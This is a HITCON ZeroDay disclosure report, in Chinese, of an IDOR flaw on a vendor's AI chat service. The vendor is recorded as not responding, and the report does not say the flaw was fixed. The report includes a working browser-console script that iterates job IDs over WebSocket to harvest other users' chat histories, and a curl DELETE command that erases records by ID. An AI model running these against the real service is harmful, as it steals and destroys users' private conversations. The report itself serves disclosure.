創鑫智慧網站漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2026-00603
  •  發信 Vendor: 創鑫智慧
  • Title: 創鑫智慧網站漏洞
  • Introduction: 系統因使用規律遞增的 ID 且缺乏身分與權限驗證,導致任何人都能透過暴力遍歷 (IDOR) 隨意刪除或竊取他人的私密對話紀錄。

處理狀態

目前狀態

公開
Last Update : 2026/06/29
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2026/04/29 15:57:53 : 新提交 (由 鄉民 更新此狀態)
  • 2026/04/29 16:00:30 : 新提交 (由 鄉民 更新此狀態)
  • 2026/04/29 16:01:31 : 新提交 (由 鄉民 更新此狀態)
  • 2026/04/29 16:21:58 : 新提交 (由 鄉民 更新此狀態)
  • 2026/05/05 09:26:27 : 新提交 (由 鄉民 更新此狀態)
  • 2026/05/05 10:35:25 : 新提交 (由 鄉民 更新此狀態)
  • 2026/05/05 12:27:46 : 新提交 (由 鄉民 更新此狀態)
  • 2026/05/06 20:38:57 : 新提交 (由 鄉民 更新此狀態)
  • 2026/05/09 17:48:24 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/27 15:29:12 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/27 15:29:12 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/27 15:29:13 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/06/29 03:00:14 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2026-00603
  • 通報者:鄉民
  • 風險:嚴重
  • 類型:資訊洩漏 (Information Leakage)

參考資料

攻擊者可利用洩漏資訊進行下一步攻擊行為。

OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure

CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://zh-tw.neuchips.ai/

敘述

一、可透過瀏覽器console 撈取其他人的對話紀錄。

(async () => {
    const startId = 500;
    const endId = 600;
    const allData = [];

    const fetchJob = (id) => {
        return new Promise((resolve) => {
            const wsUrl = `wss://neuchips.shareqa.com/api/estinetAIManager/job/${id}/ws`;
            const ws = new WebSocket(wsUrl);

            // 新增 answer 欄位來存放回復訊息
            let jobInfo = { jobid: id, question: "", answer: "", mode: "", state: "unknown" };

            console.log(`正在連線 Job ID: ${id}...`);

            const timeout = setTimeout(() => {
                ws.close();
                resolve({ ...jobInfo, state: "timeout" });
            }, 15000); 

            ws.onmessage = (event) => {
                try {
                    const data = JSON.parse(event.data);

                    // 1. 解析問題內容 (request)
                    if (data.event === "request") {
                        const inner = JSON.parse(data.message);
                        jobInfo.question = inner.original_question || "";
                        jobInfo.mode = inner.mode || "";
                    }

                    // 2. 解析回復內容 (append) -
                    if (data.event === "append") {
                        jobInfo.answer += data.message; 
                    }

                    // 3. 結束條件
                    if (data.state === "finished") {
                        jobInfo.state = "finished";
                        clearTimeout(timeout);
                        ws.close();
                    }
                } catch (e) {
                    // 非 JSON 格式忽略
                }
            };

            ws.onclose = () => {
                resolve(jobInfo);
            };

            ws.onerror = () => {
                clearTimeout(timeout);
                resolve({ ...jobInfo, state: "error" });
                ws.close();
            };
        });
    };

    // 依序執行
    for (let i = startId; i <= endId; i++) {
        const result = await fetchJob(i);
        allData.push(result);
        console.log(` ID ${i} 完成 | 問題: ${result.question.substring(0,10)}... | 回覆長度: ${result.answer.length}`);
    }

})();

========================================

二、可透過curl指令刪除對話紀錄
將id帶入以下url即可刪除該筆資料

curl -i --ssl-no-revoke -X DELETE https://neuchips.shareqa.com/api/estinetAIManager/job/{id}

修補建議

1.對話紀錄不應使用遞增數字,並且需驗證該筆對話紀錄屬於該使用者的。
2.關閉DELETE權限

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;